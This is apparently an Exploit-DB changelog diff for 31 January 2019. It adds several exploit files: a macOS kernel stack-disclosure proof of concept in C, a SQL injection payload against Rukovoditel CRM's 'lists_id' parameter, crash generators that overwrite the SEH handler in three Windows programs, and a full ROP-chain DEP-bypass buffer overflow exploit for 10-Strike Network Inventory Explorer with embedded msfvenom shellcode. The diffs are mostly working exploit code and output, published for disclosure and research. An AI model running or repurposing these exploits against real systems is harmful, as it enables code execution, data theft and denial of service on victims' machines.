DB: 2019-01-31

8 changes to exploits/shellcodes

Advanced File Manager 3.4.1 - Denial of Service (PoC)
iOS/macOS 10.13.6 - 'if_ports_used_update_wakeuuid()' 16-byte Uninitialized Kernel Stack Disclosure
IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC)
Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC)
Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)
HTML5 Video Player 1.2.5 - Local Buffer Overflow - Non SEH
Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH) (DEP Bypass)
HTML5 Video Player 1.2.5 - Local Buffer Overflow (Non SEH)
10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)

PDF Signer 3.0 - SSTI to RCE via CSRF Cookie
PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)
Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection

Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes)

exploits/hardware/webapps/46263.txt

@@ -2,7 +2,7 @@
 # Google Dork: N/A
 # Date: 23-01-2019
 ################################
-# Exploit Author: Bhushan B. Patil<https://www.exploit-db.com/?author=9551> (Exploit DB author ID: 9551)
+# Exploit Author: Bhushan B. Patil
 ################################
 # Advisory URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss
 # Affected Version: 6.2.2.2 & 6.2.3
@@ -27,11 +27,4 @@ Upgrade to version 6.3.0
 For more information about fixed software releases, consult the Cisco bug ID CSCvk30983<https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvk30983>
 
 4. Reference:
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss
-
-
-Thanks & Regards,
-
-Bhushan B. Patil
-Tech Specalist & Lead - Security Testing
-This e-mail and any attachments thereto may contain confidential information and/or information protected by intellectual property rights for the exclusive attention of the intended addressees named above. If you have received this transmission in error, please immediately notify the sender by return e-mail and delete this message and its attachments. Unauthorized use, copying or further full or partial distribution of this e-mail or its contents is prohibited. Although this e-mail and any attachments are believed to be free of any virus or other defect that may affect any computer system into which it is received and opened, it is the responsibility of the recipient to ensure that it is virus free. Paladion is not liable for any loss or damage arising in any way from the use of this e-mail or its attachments.
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss

exploits/multiple/dos/46285.c

@@ -0,0 +1,318 @@
+/*
+macOS 10.13.4 introduced the file bsd/net/if_ports_used.c, which defines sysctls for inspecting
+ports, and added the function IOPMCopySleepWakeUUIDKey() to the file
+iokit/Kernel/IOPMrootDomain.cpp. Here's the code of the latter function:
+
+	extern "C" bool
+	IOPMCopySleepWakeUUIDKey(char *buffer, size_t buf_len)
+	{
+		if (!gSleepWakeUUIDIsSet) {
+			return (false);
+		}
+	
+		if (buffer != NULL) {
+			OSString *string;
+	
+			string = (OSString *)
+			    gRootDomain->copyProperty(kIOPMSleepWakeUUIDKey);
+	
+			if (string == NULL) {
+				*buffer = '\0';
+			} else {
+				strlcpy(buffer, string->getCStringNoCopy(), buf_len);
+	
+				string->release();
+			}
+		}
+	
+		return (true);
+	}
+
+This function is interesting because it copies a caller-specified amount of data from the
+"SleepWakeUUID" property (which is user-controllable). Thus, if a user process sets "SleepWakeUUID"
+to a shorter string than the caller expects and then triggers IOPMCopySleepWakeUUIDKey(),
+out-of-bounds heap data will be copied into the caller's buffer.
+
+However, triggering this particular information leak is challenging, since the only caller is the
+function if_ports_used_update_wakeuuid(). Nonetheless, this function also contains an information
+leak:
+
+	void
+	if_ports_used_update_wakeuuid(struct ifnet *ifp)
+	{
+		uuid_t wakeuuid;							// (a) wakeuuid is uninitialized.
+		bool wakeuuid_is_set = false;
+		bool updated = false;
+	
+		if (__improbable(use_test_wakeuuid)) {
+			wakeuuid_is_set = get_test_wake_uuid(wakeuuid);
+		} else {
+			uuid_string_t wakeuuid_str;
+	
+			wakeuuid_is_set = IOPMCopySleepWakeUUIDKey(wakeuuid_str,	// (b) wakeuuid_str is controllable.
+			    sizeof(wakeuuid_str));
+			if (wakeuuid_is_set) {
+				uuid_parse(wakeuuid_str, wakeuuid);			// (c) The return value of
+			}								//     uuid_parse() is not checked.
+		}
+	
+		if (!wakeuuid_is_set) {
+			if (if_ports_used_verbose > 0) {
+				os_log_info(OS_LOG_DEFAULT,
+				    "%s: SleepWakeUUID not set, "
+				    "don't update the port list for %s\n",
+				    __func__, ifp != NULL ? if_name(ifp) : "");
+			}
+			wakeuuid_not_set_count += 1;
+			if (ifp != NULL) {
+				microtime(&wakeuuid_not_set_last_time);
+				strlcpy(wakeuuid_not_set_last_if, if_name(ifp),
+				    sizeof(wakeuuid_not_set_last_if));
+			}	
+			return;
+		}
+	
+		lck_mtx_lock(&net_port_entry_head_lock);
+		if (uuid_compare(wakeuuid, current_wakeuuid) != 0) {			// (e) These UUIDs will be different.
+			net_port_entry_list_clear();
+			uuid_copy(current_wakeuuid, wakeuuid);				// (f) Uninitialized stack garbage
+			updated = true;							//     will be copied into a sysctl
+		}									//     variable.
+		/* 
+		 * Record the time last checked
+		 
+		microuptime(&wakeuiid_last_check);
+		lck_mtx_unlock(&net_port_entry_head_lock);
+	
+		if (updated && if_ports_used_verbose > 0) {
+			uuid_string_t uuid_str;
+	
+			uuid_unparse(current_wakeuuid, uuid_str);
+			log(LOG_ERR, "%s: current wakeuuid %s\n",
+			    __func__,
+			    uuid_str);
+		}
+	}
+
+After the user-controllable "SleepWakeUUID" property is copied into the wakeuuid_str buffer using
+IOPMCopySleepWakeUUIDKey(), the UUID string is converted into a (binary) UUID using the function
+uuid_parse(). uuid_parse() is meant to parse the string-encoded UUID into the local wakeuuid
+buffer. However, the wakeuuid buffer is not initialized and the return value of uuid_parse() is not
+checked, meaning that if we set the "SleepWakeUUID" property's first character to anything other
+than a valid hexadecimal digit, we can get random stack garbage copied into the global
+current_wakeuuid buffer. This is problematic because current_wakeuuid is a sysctl variable, meaning
+its value can be read from userspace.
+
+Tested on macOS 10.13.6 17G2112:
+
+	bazad@bazad-macbookpro ~/Developer/poc/wakeuuid-leak % clang wakeuuid-leak.c -framework IOKit -framework CoreFoundation -o wakeuuid-leak
+	bazad@bazad-macbookpro ~/Developer/poc/wakeuuid-leak % ./wakeuuid-leak
+	1. Sleep the device.
+	2. Wake the device.
+	3. Press any key to continue.
+	
+	current_wakeuuid: 0xd0ddc6477f1e00b7 0xffffff801e468a28
+*/
+
+/*
+ * wakeuuid-leak.c
+ * Brandon Azad (bazad@google.com)
+ */
+
+#if 0
+iOS/macOS: 16-byte uninitialized kernel stack disclosure in if_ports_used_update_wakeuuid().
+
+macOS 10.13.4 introduced the file bsd/net/if_ports_used.c, which defines sysctls for inspecting
+ports, and added the function IOPMCopySleepWakeUUIDKey() to the file
+iokit/Kernel/IOPMrootDomain.cpp. Here's the code of the latter function:
+
+	extern "C" bool
+	IOPMCopySleepWakeUUIDKey(char *buffer, size_t buf_len)
+	{
+		if (!gSleepWakeUUIDIsSet) {
+			return (false);
+		}
+	
+		if (buffer != NULL) {
+			OSString *string;
+	
+			string = (OSString *)
+			    gRootDomain->copyProperty(kIOPMSleepWakeUUIDKey);
+	
+			if (string == NULL) {
+				*buffer = '\0';
+			} else {
+				strlcpy(buffer, string->getCStringNoCopy(), buf_len);
+	
+				string->release();
+			}
+		}
+	
+		return (true);
+	}
+
+This function is interesting because it copies a caller-specified amount of data from the
+"SleepWakeUUID" property (which is user-controllable). Thus, if a user process sets "SleepWakeUUID"
+to a shorter string than the caller expects and then triggers IOPMCopySleepWakeUUIDKey(),
+out-of-bounds heap data will be copied into the caller's buffer.
+
+However, triggering this particular information leak is challenging, since the only caller is the
+function if_ports_used_update_wakeuuid(). Nonetheless, this function also contains an information
+leak:
+
+	void
+	if_ports_used_update_wakeuuid(struct ifnet *ifp)
+	{
+		uuid_t wakeuuid;							// (a) wakeuuid is uninitialized.
+		bool wakeuuid_is_set = false;
+		bool updated = false;
+	
+		if (__improbable(use_test_wakeuuid)) {
+			wakeuuid_is_set = get_test_wake_uuid(wakeuuid);
+		} else {
+			uuid_string_t wakeuuid_str;
+	
+			wakeuuid_is_set = IOPMCopySleepWakeUUIDKey(wakeuuid_str,	// (b) wakeuuid_str is controllable.
+			    sizeof(wakeuuid_str));
+			if (wakeuuid_is_set) {
+				uuid_parse(wakeuuid_str, wakeuuid);			// (c) The return value of
+			}								//     uuid_parse() is not checked.
+		}
+	
+		if (!wakeuuid_is_set) {
+			if (if_ports_used_verbose > 0) {
+				os_log_info(OS_LOG_DEFAULT,
+				    "%s: SleepWakeUUID not set, "
+				    "don't update the port list for %s\n",
+				    __func__, ifp != NULL ? if_name(ifp) : "");
+			}
+			wakeuuid_not_set_count += 1;
+			if (ifp != NULL) {
+				microtime(&wakeuuid_not_set_last_time);
+				strlcpy(wakeuuid_not_set_last_if, if_name(ifp),
+				    sizeof(wakeuuid_not_set_last_if));
+			}	
+			return;
+		}
+	
+		lck_mtx_lock(&net_port_entry_head_lock);
+		if (uuid_compare(wakeuuid, current_wakeuuid) != 0) {			// (e) These UUIDs will be different.
+			net_port_entry_list_clear();
+			uuid_copy(current_wakeuuid, wakeuuid);				// (f) Uninitialized stack garbage
+			updated = true;							//     will be copied into a sysctl
+		}									//     variable.
+		/* 
+		 * Record the time last checked
+		 */
+		microuptime(&wakeuiid_last_check);
+		lck_mtx_unlock(&net_port_entry_head_lock);
+	
+		if (updated && if_ports_used_verbose > 0) {
+			uuid_string_t uuid_str;
+	
+			uuid_unparse(current_wakeuuid, uuid_str);
+			log(LOG_ERR, "%s: current wakeuuid %s\n",
+			    __func__,
+			    uuid_str);
+		}
+	}
+
+After the user-controllable "SleepWakeUUID" property is copied into the wakeuuid_str buffer using
+IOPMCopySleepWakeUUIDKey(), the UUID string is converted into a (binary) UUID using the function
+uuid_parse(). uuid_parse() is meant to parse the string-encoded UUID into the local wakeuuid
+buffer. However, the wakeuuid buffer is not initialized and the return value of uuid_parse() is not
+checked, meaning that if we set the "SleepWakeUUID" property's first character to anything other
+than a valid hexadecimal digit, we can get random stack garbage copied into the global
+current_wakeuuid buffer. This is problematic because current_wakeuuid is a sysctl variable, meaning
+its value can be read from userspace.
+
+Tested on macOS 10.13.6 17G2112:
+
+	bazad@bazad-macbookpro ~/Developer/poc/wakeuuid-leak % clang wakeuuid-leak.c -framework IOKit -framework CoreFoundation -o wakeuuid-leak
+	bazad@bazad-macbookpro ~/Developer/poc/wakeuuid-leak % ./wakeuuid-leak
+	1. Sleep the device.
+	2. Wake the device.
+	3. Press any key to continue.
+	
+	current_wakeuuid: 0xd0ddc6477f1e00b7 0xffffff801e468a28
+#endif
+
+#include <errno.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+
+#include <IOKit/IOKitLib.h>
+#include <sys/sysctl.h>
+
+int
+main(int argc, const char *argv[]) {
+	CFStringRef kIOPMSleepWakeUUIDKey = CFSTR("SleepWakeUUID");
+	// First get IOPMrootDomain::setProperties() called with "SleepWakeUUID" set to an invalid
+	// value.
+	io_service_t IOPMrootDomain = IOServiceGetMatchingService(
+			kIOMasterPortDefault,
+			IOServiceMatching("IOPMrootDomain"));
+	if (IOPMrootDomain == IO_OBJECT_NULL) {
+		printf("Error: Could not look up IOPMrootDomain\n");
+		return 1;
+	}
+	kern_return_t kr = IORegistryEntrySetCFProperty(
+			IOPMrootDomain,
+			kIOPMSleepWakeUUIDKey,
+			CFSTR(""));
+	if (kr != KERN_SUCCESS) {
+		printf("Error: Could not set SleepWakeUUID\n");
+		return 2;
+	}
+	// Next get IOPMrootDomain::handlePublishSleepWakeUUID() called, probably via
+	// IOPMrootDomain::handleOurPowerChangeStart(). For now, just ask the tester to sleep and
+	// wake the device.
+	printf("1. Sleep the device.\n2. Wake the device.\n3. Press any key to continue.\n");
+	getchar();
+	// Check that we successfully set an invalid UUID.
+	CFTypeRef value = IORegistryEntryCreateCFProperty(
+			IOPMrootDomain,
+			kIOPMSleepWakeUUIDKey,
+			kCFAllocatorDefault,
+			0);
+	if (!CFEqual(value, CFSTR(""))) {
+		printf("Error: SleepWakeUUID not set successfully\n");
+		return 3;
+	}
+	// Now we need to trigger the leak in if_ports_used_update_wakeuuid(). We can use the
+	// sysctl net.link.generic.system.get_ports_used.<ifindex>.<protocol>.<flags>.
+	size_t get_ports_used_mib_size = 5;
+	int get_ports_used_mib[get_ports_used_mib_size + 3];
+	int err = sysctlnametomib("net.link.generic.system.get_ports_used",
+			get_ports_used_mib, &get_ports_used_mib_size);
+	if (err != 0) {
+		return 4;
+	}
+	get_ports_used_mib[get_ports_used_mib_size++] = 1;	// ifindex
+	get_ports_used_mib[get_ports_used_mib_size++] = 0;	// protocol
+	get_ports_used_mib[get_ports_used_mib_size++] = 0;	// flags
+	uint8_t ports_used[65536 / 8];
+	size_t ports_used_size = sizeof(ports_used);
+	err = sysctl(get_ports_used_mib, get_ports_used_mib_size,
+			ports_used, &ports_used_size, NULL, 0);
+	if (err != 0) {
+		printf("Error: sysctl %s: errno %d\n",
+				"net.link.generic.system.get_ports_used", errno);
+		return 5;
+	}
+	// Finally retrieve the leak with sysctl
+	// net.link.generic.system.port_used.current_wakeuuid.
+	uint8_t current_wakeuuid[16];
+	size_t current_wakeuuid_size = sizeof(current_wakeuuid);
+	err = sysctlbyname("net.link.generic.system.port_used.current_wakeuuid",
+			current_wakeuuid, &current_wakeuuid_size, NULL, 0);
+	if (err != 0) {
+		printf("Error: sysctl %s: errno %d\n",
+				"net.link.generic.system.port_used.current_wakeuuid", errno);
+		return 6;
+	}
+	uint64_t *leak = (uint64_t *)current_wakeuuid;
+	printf("current_wakeuuid: 0x%016llx 0x%016llx\n", leak[0], leak[1]);
+	return 0;
+}

exploits/php/webapps/46282.txt

@@ -0,0 +1,41 @@
+#################################################################
+
+# Exploit Title: Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL
+Injection
+# Dork: N/A
+# Date: 27-01-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://www.rukovoditel.net/
+# Software Link: https://sourceforge.net/projects/rukovoditel/
+# Version: 2.4.1
+# Category: Webapps
+# Tested on: Wampp @Win
+# CVE: N/A
+# Software Description : Rukovoditel is a free web-based open-source
+project management
+application. A far cry from traditional applications, Rukovoditel gives
+users a broader and extensive approach to project management. Its
+customization options allow users to create additional entities, modify
+and specify the relationship between them, and generate the necessary
+reports.
+
+#################################################################
+
+# Vulnerabilities
+# For the SQL injection to be applied, the user must log in.
+then from the Application structure screen to the global list tab.
+add new value button to create a new list. You can apply sql injection
+through the generated list.
+The pictures of the weaknesses are below.
+https://i.hizliresim.com/nQJZm5.jpg
+https://i.hizliresim.com/WqGmEQ.jpg
+
+#################################################################
+
+# POC - SQLi
+# Parameters : lists_id=1 (string)
+# Attack Pattern : -1'+UnIOn+SeLEcT+1,2--+
+# GET Request :
+http://localhost/[PATH]/index.php?module=global_lists/choices&lists_id=1'[SQL]
+
+#################################################################

exploits/windows/dos/46284.py

@@ -0,0 +1,21 @@
+# Exploit Title: Advanced File Manager v3.4.1 - Denial of Service (PoC)
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2019-01-30
+# Vendor Homepage: http://www.advexsoft.com
+# Software Link : http://www.advexsoft.com
+# Tested Version: 3.4.1
+# Tested on: Windows XP SP3
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run af_mgr.exe
+# 2.- copy content af_mgr_Crash.txt or 300 "A" to clipboard (result from this python script)
+# 3.- Go to Help - Enter registration code and paste the result in all fields: "Person", "Organization", "E-mail" and "Enter your registration key below, please:"
+# 4.- Click in Register button and you will see a crash.
+
+#!/usr/bin/env python
+
+crash = "\x41" * 300
+f = open ("af_mgr_Crash.txt", "w")
+f.write(crash)
+f.close()

exploits/windows/dos/46286.py

@@ -0,0 +1,65 @@
+# Exploit Title: IP TOOLS v2.50 - Denial of Service (PoC) and SEH overwritten Crash PoC
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2018-12-20
+# Vendor Homepage: https://www.ks-soft.net/ip-tools.eng/index.htm
+# Software Link : https://www.ks-soft.net/ip-tools.eng/index.htm / https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe
+# Tested Version: 2.50
+# Tested on: Windows XP SP3
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run IP-Tools.exe
+# 2.- Go to SNMP Scanner tab and copy content of IPTools_Crash.txt to clipboard
+# 3.- Paste the content into the field: 'From Addr' and 'To Addr'
+# 4.- Click 'Start' button and you will see a crash.
+
+
+'''
+SEH chain of main thread
+Address    SE handler
+0012F4B4   43434343
+42424242   *** CORRUPT ENTRY ***
+
+
+
+EAX 0012F4CC
+ECX 00000000
+EDX 44444444
+EBX 0012F4CC
+ESP 0012E490
+EBP 0012F4DC ASCII
+"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
+ESI 0012E4A4 ASCII
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+EDI 02256720 ASCII
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+EIP 00403F70 IP-TOOLS.00403F70
+C 0  ES 0023 32bit 0(FFFFFFFF)
+P 1  CS 001B 32bit 0(FFFFFFFF)
+A 0  SS 0023 32bit 0(FFFFFFFF)
+Z 0  DS 0023 32bit 0(FFFFFFFF)
+S 0  FS 003B 32bit 7FFDD000(FFF)
+T 0  GS 0000 NULL
+D 0
+O 0  LastErr ERROR_SUCCESS (00000000)
+EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
+ST0 empty
+ST1 empty
+ST2 empty
+ST3 empty
+ST4 empty
+ST5 empty
+ST6 empty
+ST7 empty
+               3 2 1 0      E S P U O Z D I
+FST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0  (LT)
+FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0
+'''
+
+#!/usr/bin/env python
+
+junk = "\x41" * 4112
+crash = junk + "BBBB" + "CCCC" + "D" * (5000 - len(junk) - 8)
+f = open ("IPTools_Crash.txt", "w")
+f.write(crash)
+f.close()

exploits/windows/dos/46287.py

@@ -0,0 +1,65 @@
+# Exploit Title: Necrosoft DIG v0.4 - Denial of Service (PoC) SEH overwritten Crash PoC
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2005-01-10
+# Vendor Homepage: http://www.nscan.org/?index=dns
+# Software Link : http://www.nscan.org/?index=dns
+# Tested Version: 0.4
+# Tested on: Windows XP SP3
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run Necrosoft DIG v0.4 (dig.exe)
+# 2.- copy content DIG_Crash.txt to clipboard (result from this python script)
+# 3.- Paste the content into the field: 'Target'
+# 4.- Click 'TCP lookup' button and you will see a crash.
+
+
+'''
+SEH chain of thread 000003CC
+Address    SE handler
+00D9FF08   43434343
+42424242   *** CORRUPT ENTRY ***
+
+
+EAX 0000000E
+ECX 000004D2
+EDX 000004E0
+EBX 00000041
+ESP 00D9FACC
+EBP 0012FB60
+ESI 00D9FB20
+EDI 009284C5 ASCII
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+EIP 004036B2 DIG.004036B2
+C 0  ES 0023 32bit 0(FFFFFFFF)
+P 1  CS 001B 32bit 0(FFFFFFFF)
+A 0  SS 0023 32bit 0(FFFFFFFF)
+Z 0  DS 0023 32bit 0(FFFFFFFF)
+S 1  FS 003B 32bit 7FFDB000(FFF)
+T 0  GS 0000 NULL
+D 0
+O 0  LastErr ERROR_SUCCESS (00000000)
+EFL 00010286 (NO,NB,NE,A,S,PE,L,LE)
+ST0 empty
+ST1 empty
+ST2 empty
+ST3 empty
+ST4 empty
+ST5 empty
+ST6 empty
+ST7 empty
+               3 2 1 0      E S P U O Z D I
+FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
+FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
+
+
+'''
+
+#!/usr/bin/env python
+
+junk = "\x41" * 985
+crash = junk + "BBBB" + "CCCC" + "\x41" * (2000 - 985 - 4 - 4)
+print "SEH overwritten Crash, full payload length =",len(crash)
+f = open ("DIG_Crash.txt", "w")
+f.write(crash)
+f.close()

exploits/windows/local/46283.py

@@ -0,0 +1,115 @@
+#!/usr/bin/python
+
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)
+# Date: 01-29-19
+# Vulnerable Software: 10-Strike Network Inventory Explorer 8.54
+# Vendor Homepage: https://www.10-strike.com/
+# Version: 8.54 
+# Software Link 1: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Tested Windows 7 SP1 x86
+
+# PoC
+# 1. run script
+# 2. open app, select Computers tab  
+# 3. click on 'From Text File'
+# 4. choose 10strike.txt that was generated 
+# 5. pop calc
+
+# manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds
+# practicing dep bypass by not using auto generated mona.py ropchains
+
+# original seh poc from Hashim Jawad, EDB: 44838
+# notes from author state offset is based upon username size, username for poc is 'user'
+
+# badchars; \x00\x0a\x0d\x2f
+
+import struct
+
+filename = "10strike.txt"
+
+junk  = "\x41" * 209
+
+seh = struct.pack('<L',0x10013e29)
+
+fill = "\x42"*12
+
+#VirtualProtect()
+#ESI = ptr to VirtualProtect()
+rop = struct.pack('<L',0x7c3762b3)   # POP EAX # RETN 
+rop += struct.pack('<L',0x61e9b30c)  # ptr to &VirtualProtect() 
+rop += struct.pack('<L',0x1001872e)  # MOV EAX,DWORD PTR DS:[EAX] # RETN 
+rop += struct.pack('<L',0x100101f2)  # POP EBX # RETN 
+rop += struct.pack('<L',0xffffffff)  #
+rop += struct.pack('<L',0x100186d1)  # ADD EBX,EAX # XOR EAX,EAX # RETN
+rop += struct.pack('<L',0x7c358a01)  # INC EBX # XOR EAX,EAX # RETN 
+rop += struct.pack('<L',0x7c3501d5)  # POP ESI # RETN
+rop += struct.pack('<L',0xffffffff)  #
+rop += struct.pack('<L',0x61e8509c)  # ADD ESI,EBX # RETN 
+rop += struct.pack('<L',0x7c370464)  # INC ESI # RETN 
+
+#EBP = ReturnTo (ptr to jmp esp)
+#mona.py jmp -r esp -cpb '\x00\x0a\x0d'
+rop += struct.pack('<L',0x61e05892)  # POP EBP # RETN 
+rop += struct.pack('<L',0x61e053a9)  # push esp # ret
+
+#EBX = dwSize x201
+rop += struct.pack('<L',0x7c348495)  # POP EAX # RETN 
+rop += struct.pack('<L',0xfffffdff)  # 
+rop += struct.pack('<L',0x7c351e05)  # NEG EAX # RETN 
+rop += struct.pack('<L',0x100101f2)  # POP EBX # RETN 
+rop += struct.pack('<L',0xffffffff)  #  
+rop += struct.pack('<L',0x61e0579d)  # INC EBX # RETN 
+rop += struct.pack('<L',0x100186d1)  # ADD EBX,EAX # XOR EAX,EAX # RETN 
+	  
+#EDX = NewProtect (0x40)
+rop += struct.pack('<L',0x7c344160)  # POP EDX # RETN 
+rop += struct.pack('<L',0xffffffc0)  # 
+rop += struct.pack('<L',0x7c351eb1)  # NEG EDX # RETN 
+	  
+#ECX = lpOldProtect (ptr to W address)
+rop += struct.pack('<L',0x7c37157a)  # POP ECX # RETN
+rop += struct.pack('<L',0x61e894c0)  # &Writable location sqlite3
+
+#EDI = ROP NOP (RETN)
+rop += struct.pack('<L',0x1001ab53)  # POP EDI # RETN
+rop += struct.pack('<L',0x1001ab54)  # ROP-NOP 
+	  
+#EAX = NOP (0x90909090)
+rop += struct.pack('<L',0x7c3647cc)  # POP EAX # RETN 
+rop += struct.pack('<L',0x90909090)  # nop
+
+#PUSHAD
+rop += struct.pack('<L',0x10019094)  # PUSHAD # RETN 
+
+nops = "\x90"*10
+
+#msfvenom -p windows/exec cmd=calc.exe -b '\x00\x0a\x0d\x3a\x5c' -f python
+#Payload size: 220 bytes
+calc =  ""
+calc += "\xbb\x29\x86\xf9\x07\xda\xdb\xd9\x74\x24\xf4\x5e\x31"
+calc += "\xc9\xb1\x31\x31\x5e\x13\x83\xee\xfc\x03\x5e\x26\x64"
+calc += "\x0c\xfb\xd0\xea\xef\x04\x20\x8b\x66\xe1\x11\x8b\x1d"
+calc += "\x61\x01\x3b\x55\x27\xad\xb0\x3b\xdc\x26\xb4\x93\xd3"
+calc += "\x8f\x73\xc2\xda\x10\x2f\x36\x7c\x92\x32\x6b\x5e\xab"
+calc += "\xfc\x7e\x9f\xec\xe1\x73\xcd\xa5\x6e\x21\xe2\xc2\x3b"
+calc += "\xfa\x89\x98\xaa\x7a\x6d\x68\xcc\xab\x20\xe3\x97\x6b"
+calc += "\xc2\x20\xac\x25\xdc\x25\x89\xfc\x57\x9d\x65\xff\xb1"
+calc += "\xec\x86\xac\xff\xc1\x74\xac\x38\xe5\x66\xdb\x30\x16"
+calc += "\x1a\xdc\x86\x65\xc0\x69\x1d\xcd\x83\xca\xf9\xec\x40"
+calc += "\x8c\x8a\xe2\x2d\xda\xd5\xe6\xb0\x0f\x6e\x12\x38\xae"
+calc += "\xa1\x93\x7a\x95\x65\xf8\xd9\xb4\x3c\xa4\x8c\xc9\x5f"
+calc += "\x07\x70\x6c\x2b\xa5\x65\x1d\x76\xa3\x78\x93\x0c\x81"
+calc += "\x7b\xab\x0e\xb5\x13\x9a\x85\x5a\x63\x23\x4c\x1f\x9b"
+calc += "\x69\xcd\x09\x34\x34\x87\x08\x59\xc7\x7d\x4e\x64\x44"
+calc += "\x74\x2e\x93\x54\xfd\x2b\xdf\xd2\xed\x41\x70\xb7\x11"
+calc += "\xf6\x71\x92\x71\x99\xe1\x7e\x58\x3c\x82\xe5\xa4"
+
+pad = "\x45"*(3000 - len(junk + seh + fill + rop + nops + calc))
+
+buffer = junk + seh + fill + rop + nops + calc + pad
+
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()

files_exploits.csv

@@ -6276,6 +6276,10 @@ id,file,description,date,author,type,platform,port
 46261,exploits/hardware/dos/46261.sh,"Sricam gSOAP 2.8 - Denial of Service",2019-01-28,"Andrew Watson",dos,hardware,5000
 46272,exploits/windows/dos/46272.py,"Smart VPN 1.1.3.0 - Denial of Service (PoC)",2019-01-28,0xB9,dos,windows,
 46278,exploits/linux/dos/46278.py,"MiniUPnPd 2.1 - Out-of-Bounds Read",2019-01-29,b1ack0wl,dos,linux,
+46284,exploits/windows/dos/46284.py,"Advanced File Manager 3.4.1 - Denial of Service (PoC)",2019-01-30,"Rafael Pedrero",dos,windows,
+46285,exploits/multiple/dos/46285.c,"iOS/macOS 10.13.6 - 'if_ports_used_update_wakeuuid()' 16-byte Uninitialized Kernel Stack Disclosure",2019-01-30,"Google Security Research",dos,multiple,
+46286,exploits/windows/dos/46286.py,"IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC)",2019-01-30,"Rafael Pedrero",dos,windows,
+46287,exploits/windows/dos/46287.py,"Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC)",2019-01-30,"Rafael Pedrero",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10251,8 +10255,9 @@ id,file,description,date,author,type,platform,port
 46255,exploits/windows/local/46255.py,"Easy Video to iPod Converter 1.6.20 - Buffer Overflow (SEH)",2019-01-28,"Nawaf Alkeraithe",local,windows,
